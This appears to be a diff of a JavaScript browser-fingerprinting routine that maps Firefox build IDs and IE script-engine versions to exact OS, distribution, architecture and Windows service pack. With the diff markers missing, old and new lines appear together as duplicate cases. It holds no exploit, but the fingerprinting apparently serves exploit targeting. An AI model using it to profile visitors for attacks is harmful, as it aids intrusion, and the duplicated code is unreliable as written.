case "20100115132715": ua_version = "3.6.0"; os_name = oses_mac_osx; break;
case "20100115133306": ua_version = "3.6.0"; os_name = oses_linux; break;
case "20100115144158": ua_version = "3.6.0"; os_name = oses_windows; break;
case "20100125074043": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
case "20100125074127": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "20100125204847": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; // Could also be Mint x86
case "20100125204903": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "20100125074043": ua_version = "3.6.0"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
case "20100125074127": ua_version = "3.6.0"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "20100125204847": ua_version = "3.6.0"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86; break; // Could also be Mint x86
case "20100125204903": ua_version = "3.6.0"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "20100202152834": ua_version = "3.5.8"; os_name = oses_mac_osx; break;
case "20100202153512": ua_version = "3.5.8"; os_name = oses_linux; break;
case "20100202165920": ua_version = "3.5.8"; os_name = oses_windows; break;
case "2010020219": ua_version = "3.0.18"; os_name = oses_mac_osx; break;
case "2010020220": ua_version = "3.0.18"; os_name = oses_windows; break;
case "2010020400": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "SUSE"; break;
case "20100212131909": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100212132013": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100216105329": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20100216105348": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20100216105410": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20100216110009": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "2010021718": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
case "20100218022359": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100218022705": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100218112915": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
case "20100222120605": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100222120717": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100301015346": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20100305054927": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
case "20100307204001": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20100308142847": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100308151019": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "2010020400": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "SUSE"; break;
case "20100212131909": ua_version = "3.6.0.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100212132013": ua_version = "3.6.0.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100216105329": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20100216105348": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20100216105410": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20100216110009": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "2010021718": ua_version = "3.0.18"; os_name = oses_linux; os_vendor = "CentOS"; arch = arch_x86; break;
case "20100218022359": ua_version = "3.6.0.4"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100218022705": ua_version = "3.6.0.4"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100218112915": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
case "20100222120605": ua_version = "3.6.0.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100222120717": ua_version = "3.6.0.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100301015346": ua_version = "3.6.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20100305054927": ua_version = "3.6.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
case "20100307204001": ua_version = "3.6.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20100308142847": ua_version = "3.6.0.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100308151019": ua_version = "3.6.0.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "2010031218": ua_version = "3.0.19"; break; // Mac OS X or Linux
case "2010031422": ua_version = "3.0.19"; os_name = oses_windows; break;
case "20100315075757": ua_version = "3.5.9"; os_name = oses_linux; break;
@ -575,48 +582,48 @@ os_detect.getVersion = function(){
case "20100316055951": ua_version = "3.6.2"; os_name = oses_mac_osx; break;
case "20100316060223": ua_version = "3.6.2"; os_name = oses_linux; break;
case "20100316074819": ua_version = "3.6.2"; os_name = oses_windows; break;
case "2010031700": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "SUSE"; break;
case "20100323102218": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20100323102339": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20100323194640": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
case "20100324182054": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20100330071911": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20100330072017": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20100330072020": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20100330072034": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "2010031700": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "SUSE"; break;
case "20100323102218": ua_version = "3.6.2"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20100323102339": ua_version = "3.6.2"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20100323194640": ua_version = "3.6.2"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
case "20100324182054": ua_version = "3.6.2"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20100330071911": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20100330072017": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20100330072020": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20100330072034": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20100401064631": ua_version = "3.6.3"; os_name = oses_mac_osx; break;
case "20100401074458": ua_version = "3.6.3"; os_name = oses_linux; break;
case "20100401080539": ua_version = "3.6.3"; os_name = oses_windows; break;
case "20100401144201": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break;
case "20100402041908": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100403042003": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20100403082016": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20100404024515": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100404024646": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100404104043": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
case "20100409151117": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100409170726": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100412125148": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
case "20100401144201": ua_version = "3.6.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Mint"; arch = arch_x86_64; break;
case "20100402041908": ua_version = "3.6.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100403042003": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20100403082016": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20100404024515": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100404024646": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100404104043": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "PClinuxOS"; arch = arch_x86_64; break;
case "20100409151117": ua_version = "3.6.3.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100409170726": ua_version = "3.6.3.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100412125148": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
case "20100413152922": ua_version = "3.6.4.b1"; os_name = oses_mac_osx; break;
case "20100413154310": ua_version = "3.6.4.b1"; os_name = oses_linux; break;
case "20100413172113": ua_version = "3.6.4.b1"; os_name = oses_windows; break;
case "20100415062243": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100415103754": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100416101101": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
case "2010041700": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break;
case "20100419015333": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
case "20100423043606": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
case "20100423140709": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100423141150": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100423142835": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20100415062243": ua_version = "3.6.3.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100415103754": ua_version = "3.6.3.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100416101101": ua_version = "3.6.3.2"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
case "2010041700": ua_version = "3.6.4.1"; os_name = oses_linux; os_vendor = "SUSE"; break;
case "20100419015333": ua_version = "3.6.3"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
case "20100423043606": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86_64; break;
case "20100423140709": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100423141150": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100423142835": ua_version = "3.6.3"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20100502202326": ua_version = "3.6.4.b2"; os_name = oses_linux; break;
case "20100502202401": ua_version = "3.6.4.b2"; os_name = oses_mac_osx; break;
case "20100502221517": ua_version = "3.6.4.b2"; os_name = oses_windows; break;
@ -626,69 +633,69 @@ os_detect.getVersion = function(){
case "20100504085637": ua_version = "3.5.10"; os_name = oses_linux; break;
case "20100504085753": ua_version = "3.5.10"; os_name = oses_mac_osx; break;
case "20100504093643": ua_version = "3.5.10"; os_name = oses_windows; break;
case "2010050600": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "SUSE"; break;
case "2010051300": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break;
case "2010050600": ua_version = "3.5.10"; os_name = oses_linux; os_vendor = "SUSE"; break;
case "2010051300": ua_version = "3.6.4.1"; os_name = oses_linux; os_vendor = "SUSE"; break;
case "20100513134853": ua_version = "3.6.4.b4"; os_name = oses_mac_osx; break;
case "20100513140540": ua_version = "3.6.4.b4"; os_name = oses_linux; break;
case "20100513144105": ua_version = "3.6.4.b4"; os_name = oses_windows; break;
case "20100513190740": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
case "20100513190740": ua_version = "3.6.3"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
case "20100523180910": ua_version = "3.6.4.b5"; os_name = oses_mac_osx; break;
case "20100523181754": ua_version = "3.6.4.b5"; os_name = oses_linux; break;
case "20100523185824": ua_version = "3.6.4.b5"; os_name = oses_windows; break;
case "20100527084110": ua_version = "3.6.4.b6"; os_name = oses_mac_osx; break;
case "20100527085242": ua_version = "3.6.4.b6"; os_name = oses_linux; break;
case "20100527093236": ua_version = "3.6.4.b6"; os_name = oses_windows; break;
case "2010061100": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "SUSE"; break;
case "2010061100": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "SUSE"; break;
case "20100611134546": ua_version = "3.6.4.b7"; os_name = oses_mac_osx; break;
case "20100611135942": ua_version = "3.6.4.b7"; os_name = oses_linux; break;
case "20100611143157": ua_version = "3.6.4.b7"; os_name = oses_windows; break;
case "20100622203044": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20100622203045": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20100622204750": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20100622204830": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20100622205038": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
case "20100623081410": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86_64; break;
case "20100623081921": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
case "20100623155731": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100623200132": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100622203044": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20100622203045": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20100622204750": ua_version = "3.5.10"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20100622204830": ua_version = "3.5.10"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20100622205038": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "PClinuxOS"; arch = arch_x86_64; break;
case "20100623081410": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "CentOS"; arch = arch_x86_64; break;
case "20100623081921": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "CentOS"; arch = arch_x86; break;
case "20100623155731": ua_version = "3.6.4.b7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100623200132": ua_version = "3.6.4.b7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100625222733": ua_version = "3.6.6"; os_name = oses_linux; break;
case "20100625223402": ua_version = "3.6.6"; os_name = oses_mac_osx; break;
case "20100625231939": ua_version = "3.6.6"; os_name = oses_windows; break;
case "20100626104508": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20100627211341": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
case "20100628082832": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
case "20100628124739": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100628143222": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100628232431": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100629034705": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100629105354": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
case "20100630130433": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100626104508": ua_version = "3.6.4"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20100627211341": ua_version = "3.6.4"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
case "20100628082832": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "PClinuxOS"; arch = arch_x86_64; break;
case "20100628124739": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100628143222": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100628232431": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100629034705": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100629105354": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
case "20100630130433": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100630131607": ua_version = "4.0.0.b1"; os_name = oses_mac_osx; break;
case "20100630132217": ua_version = "4.0.0.b1"; os_name = oses_linux; break;
case "20100630141702": ua_version = "4.0.0.b1"; os_name = oses_windows; break;
case "20100630174226": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
case "20100630180611": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break;
case "20100709115208": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20100709183408": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100630174226": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86_64; break;
case "20100630180611": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86; break;
case "20100709115208": ua_version = "3.6.7.b1"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20100709183408": ua_version = "3.6.7.b1"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break;
case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "20110318052756": ua_version = "4.0"; os_name = oses_windows; break; // browsershots: Firefox 4.0 / Windows XP
case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch)
case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch)
case "20110615151330": ua_version = "5.0"; os_name = oses_windows; break; // browsershots: Firefox 5.0 / Windows XP
case "20110811165603": ua_version = "6.0"; os_name = oses_windows; break; // browsershots: Firefox 6.0 / Windows XP
case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch)
case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch)
case "20110922153450": ua_version = "7.0"; os_name = oses_windows; break; // browsershots: Firefox 7.0 / Windows XP
case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch)
case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch)
case "20111104165243": ua_version = "8.0"; os_name = oses_windows; break; // browsershots: Firefox 8.0 / Windows XP
case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala)
case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala)
case "20111216140209": ua_version = "9.0"; os_name = oses_windows; break; // browsershots: Firefox 9.0 / Windows XP
case "20120129021758": ua_version = "10.0"; os_name = oses_windows; break; // browsershots: Firefox 10.0 / Windows 2000
case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch)
case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch)
case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala)
case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala)
case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch)
case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch)
case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala)
case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala)
case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "20120312181643":
// It is disconcerting that a buildID is the same on Windows
// and Mac, need to examine more versions on Mac.
@ -699,9 +706,9 @@ os_detect.getVersion = function(){
os_name = oses_windows; // browsershots: Firefox 11.0 / Windows XP
}
break;
case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch)
case "20120423142301": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "20120424151700": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Fedora"; break;
case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch)
case "20120423142301": ua_version = "12.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "20120424151700": ua_version = "12.0"; os_name = oses_linux; os_vendor = "Fedora"; break;
default:
version = this.searchVersion("Firefox", navigator.userAgent);
// Verify whether the ua string is lying by checking if it contains
@ -731,64 +738,67 @@ os_detect.getVersion = function(){
// share.
os_name = oses_windows;
ua_name = clients_ie;
version = ScriptEngineMajorVersion().toString();
version += ScriptEngineMinorVersion().toString();
version += ScriptEngineBuildVersion().toString();
version_maj = ScriptEngineMajorVersion().toString();
version_min = ScriptEngineMinorVersion().toString();
version_build = ScriptEngineBuildVersion().toString();
version = version_maj + version_min + version_build;
//document.write("ScriptEngine: "+version+"<br />");
switch (version){
case "514615":
// IE 5.00.2920.0000, 2000 Advanced Server SP0 English
ua_version = "5.0";
os_flavor = "2000";
os_name = "Windows 2000";
os_sp = "SP0";
break;
case "515907":
os_flavor = "2000";
os_name = "Windows 2000";
os_sp = "SP3"; //or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109
break;
case "518513":
os_flavor = "2000";
os_name = "Windows 2000";
os_sp = "SP4";
break;
case "566626":
// IE 6.0.2600.0000, XP SP0 English
// IE 6.0.2800.1106, XP SP1 English
ua_version = "6.0";
os_flavor = "XP";
os_name = "Windows XP";
os_sp = "SP0";
break;
case "568515":
// IE 6.0.3790.0, 2003 Standard SP0 English
ua_version = "6.0";
os_flavor = "2003";
os_name = "Windows 2003";
os_sp = "SP0";
break;
case "568820":
// IE 6.0.2900.2180, xp sp2 english
os_flavor = "XP";
os_name = "Windows XP";
os_sp = "SP2";
break;
case "568827":
os_flavor = "2003";
os_name = "Windows 2003";
os_sp = "SP1";
break;
case "568831": //XP SP2 -OR- 2K SP4
if (os_flavor == "2000"){
if (os_name == "2000"){
os_sp = "SP4";
}
else{
os_flavor = "XP";
os_name = "Windows XP";
os_sp = "SP2";
}
break;
case "568832":
os_flavor = "2003";
os_name = "Windows 2003";
os_sp = "SP2";
break;
case "568837":
// IE 6.0.2900.2180, XP Professional SP2 Korean
ua_version = "6.0";
os_flavor = "XP";
os_name = "Windows XP";
os_sp = "SP2";
break;
